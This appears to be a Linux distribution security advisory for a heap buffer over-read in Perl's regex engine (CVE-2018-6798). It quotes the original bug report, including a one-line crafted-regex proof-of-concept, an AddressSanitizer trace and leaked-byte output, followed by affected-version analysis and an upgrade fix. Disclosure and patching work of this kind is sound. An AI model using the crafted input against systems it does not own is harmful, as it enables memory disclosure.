CLD-361 Details

Other IDs this deficiency may be known by:

CVE ID CVE-2018-6798 (nvd) (mitre) (debian) (archlinux) (red hat) (suse) (ubuntu)
Other ID(s)

Basic Information:

Affected Package(s) perl
Deficiency Type SECURITY
Date Created 2018-04-14 11:59:50
Date Last Modified 2018-04-14 15:46:30

Version Specific Information:

Cucumber 1.0 i686 not affected
Cucumber 1.0 x86_64 not affected

Cucumber 1.1 i686 fixed in perl-5.26.2-i686-1
Cucumber 1.1 x86_64 fixed in perl-5.26.2-x86_64-1

Details:

================================ Initial Report ================================

From https://rt.perl.org/Public/Bug/Display.html?id=132063:

Greetings,
With crafted regex match, I have found a heap-over-flow in function
Perl__byte_dump_string, which would lead to memory leak.

**********Build Date & Hardware**********
Version: Version: the dev version (https://perl5.git.perl.org/perl.git)
manh@manh-VirtualBox:~/Fuzzing/afl/perl$ ./perl/perl -v

This is perl 5, version 27, subversion 4 (v5.27.4 (v5.27.3-14-gd2dccc0)) built for x86_64-linux

Copyright 1987-2017, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using "man perl" or "perldoc perl".  If you have access to the
Internet, point your browser at http://www.perl.org/, the Perl Home Page.
--------------
OS: Ubuntu 16.04 Desktop
manh@manh-VirtualBox:~/Fuzzing/afl/perl$ uname -a
Linux manh-VirtualBox 4.4.0-92-generic #115-Ubuntu SMP Thu Aug 10 09:04:33 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
--------------
Compilation:
AFL_USE_ASAN=1 ./Configure -des -Dusedevel -DDEBUGGING -Dcc=afl-clang-fast -Doptimize=-O0\ -g && AFL_USE_ASAN=1 make

**********Reproduce**********
manh@manh-VirtualBox:~/Fuzzing/afl/perl$ ./perl/perl -e '$x="(?il)\x{100}|\x{100}"; "\xff" =~ /$x/;'
=================================================================
==11464==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001b3a at pc 0x000000c66a61 bp 0x7ffd2e7fafb0 sp 0x7ffd2e7fafa8
READ of size 1 at 0x602000001b3a thread T0
    #0 0xc66a60 in Perl__byte_dump_string /home/manh/Fuzzing/afl/perl/perl/utf8.c:977:39
    #1 0xc66a60 in S_unexpected_non_continuation_text /home/manh/Fuzzing/afl/perl/perl/utf8.c:1036
    #2 0xc66a60 in Perl_utf8n_to_uvchr_error /home/manh/Fuzzing/afl/perl/perl/utf8.c:1707
    #3 0xc5d678 in Perl__force_out_malformed_utf8_message /home/manh/Fuzzing/afl/perl/perl/utf8.c:90:12
    #4 0xc726ae in Perl__to_utf8_fold_flags /home/manh/Fuzzing/afl/perl/perl/utf8.c:3583:5
    #5 0xbf7b22 in S_find_byclass /home/manh/Fuzzing/afl/perl/perl/regexec.c:2626:25
    #6 0xbde716 in Perl_regexec_flags /home/manh/Fuzzing/afl/perl/perl/regexec.c:3389:13
    #7 0x91ee92 in Perl_pp_match /home/manh/Fuzzing/afl/perl/perl/pp_hot.c:2222:10
    #8 0x8396bc in Perl_runops_debug /home/manh/Fuzzing/afl/perl/perl/dump.c:2486:23
    #9 0x5e0342 in S_run_body /home/manh/Fuzzing/afl/perl/perl/perl.c
    #10 0x5e0342 in perl_run /home/manh/Fuzzing/afl/perl/perl/perl.c:2484
    #11 0x5095cb in main /home/manh/Fuzzing/afl/perl/perl/perlmain.c:154:9
    #12 0x7fc01990082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #13 0x435928 in _start (/home/manh/Fuzzing/afl/perl/perl/perl+0x435928)

0x602000001b3a is located 0 bytes to the right of 10-byte region [0x602000001b30,0x602000001b3a)
allocated by thread T0 here:
    #0 0x4dc62c in malloc /scratch/llvm/clang-4/xenial/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66:3
    #1 0x83ed2b in Perl_safesysmalloc /home/manh/Fuzzing/afl/perl/perl/util.c:153:21

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/manh/Fuzzing/afl/perl/perl/utf8.c:977:39 in Perl__byte_dump_string
Shadow bytes around the buggy address:
  0x0c047fff8310: fa fa 00 02 fa fa 00 06 fa fa 00 02 fa fa 00 02
  0x0c047fff8320: fa fa 00 fa fa fa 00 02 fa fa 00 fa fa fa 00 03
  0x0c047fff8330: fa fa 00 05 fa fa 02 fa fa fa fd fd fa fa fd fd
  0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8350: fa fa 00 04 fa fa fd fa fa fa fd fd fa fa fd fd
=>0x0c047fff8360: fa fa fd fa fa fa 00[02]fa fa fd fa fa fa fd fd
  0x0c047fff8370: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 00 02
  0x0c047fff8380: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8390: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff83a0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa 00 00
  0x0c047fff83b0: fa fa fd fd fa fa fd fd fa fa 00 00 fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==11464==ABORTING
**********More info**********
If perl is compiled with gcc, in non-debug mode
    ./Configure -des -Dusedevel -Dcc=gcc -Doptimize=-O0\ -ggdb
then perl will leak some bytes after the crafted utf8 string:
root@manh-VirtualBox:/home# ./perl/perl -MConfig -e 'print $Config{optimize}, "\n"'
-O0 -ggdb
root@manh-VirtualBox:/home# ./perl/perl -MConfig -e 'print $Config{ccflags}, "\n"'
-fwrapv -DDEBUGGING -fno-strict-aliasing -pipe -fstack-protector-strong -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -D_FORTIFY_SOURCE=2
root@manh-VirtualBox:/home# ./perl/perl -MConfig -e 'print $Config{cc}, "\n"'
gcc
root@manh-VirtualBox:/home# ./perl/perl -e '$x="(?il)\x{100}|\x{100}"; "\xff" =~ /$x/;'
Malformed UTF-8 character: \xff\x00\xfa\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00 (unexpected non-continuation byte 0x00, immediately after start byte 0xff; need 13 bytes, got 1) in pattern match (m//) at -e line 1.
Malformed UTF-8 character (fatal) at -e line 1.
root@manh-VirtualBox:/home# ./perl/perl -e '$x="(?il)\x{100}|\x{100}"; "\xff" =~ /$x/;'
Malformed UTF-8 character: \xff\x00\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 (unexpected non-continuation byte 0x00, immediately after start byte 0xff; need 13 bytes, got 1) in pattern match (m//) at -e line 1.
Malformed UTF-8 character (fatal) at -e line 1.

Best,
Manh

============================ Additional Information ============================

See the entire thread at https://rt.perl.org/Public/Bug/Display.html?id=132063

================================= Our Analysis =================================

----- Affected Products -----
We have verified in our lab environment that Perl 5.26 is vulnerable. This
includes Perl as originally packaged in Cucumber Linux 1.1.

We have found Perl 5.22 not to be vulnerable. This includes Perl as most
recently (as of Sat Apr 14 14:46:12 EDT 2018) packaged in Cucumber Linux 1.0.

----- Scope and Impact of this Vulnerability -----
Allows for information disclosure (memory disclosure) via a specially crafted
regex.

----- Testing if you are Affected -----
You can test if the version of Perl running on your system is vulnerable by
running the command:

perl -e '$x="(?il)\x{100}|\x{100}"; "\xff" =~ /$x/;'

If it results in output similar to:

Malformed UTF-8 character: \xff\x00\xfa\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00 (unexpected non-continuation byte 0x00, immediately after start byte 0xff; need 13 bytes, got 1) in pattern match (m//) at -e line 1.

then your system is affected.

----- Fix for this Vulnerability -----
For Perl 5.26, this vulnerability can be fixed by upgrading to Perl 5.26.2.
Alternatively, it can allegedly be fixed by applying the patches from the
following commits (we have not verified this):
https://perl5.git.perl.org/perl.git/commitdiff/8e6f44c90c7fa1f63c19a44c45482b09a407e15b
https://perl5.git.perl.org/perl.git/commitdiff/8b80ce67ff257aaa36e47eaf4194d27a51595524

================================= Our Solution =================================

Cucumber Linux 1.1:
We have upgraded to Perl 5.26.2.

Cucumber Linux 1.0:
No action necessary: not affected.